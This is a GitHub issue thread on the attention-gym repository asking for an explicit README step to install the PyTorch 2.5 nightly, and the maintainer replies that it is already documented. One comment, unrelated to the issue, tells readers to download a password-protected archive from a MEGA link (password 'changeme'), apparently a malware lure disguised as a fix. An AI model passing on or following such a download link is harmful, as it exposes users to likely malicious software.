### ISSUE TITLE
Add explicit code statement in README for installing PyTorch 2.5 (currently only available as nightly)

### ISSUE THREAD

**Issue by sachinkadyan7** [pytorch-labs/attention-gym#47]
Following the suggested installation instructions in the README installs only the latest stable release of Torch (currently 2.4.1) but the package requires version 2.5.0 or above.

A code line should be added in the README to explicitly specify the step of installing the Nightly release of PyTorch (nightly only for now, can be updated later).

```bash
pip install --pre torch --index-url https://download.pytorch.org/whl/nightly/cu124
```

Otherwise, the stable PyTorch version is installed and leads to import errors because of file name differences (`_flex_attention.py` vs `flex_attention.py`)

**Comment by SagarChandra07** [comment]
install this

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA

Password: changeme

you may need to install the c compiler

**Comment by drisspg** [comment]
We have this statement in the Readme: https://github.com/pytorch-labs/attention-gym#prerequisites
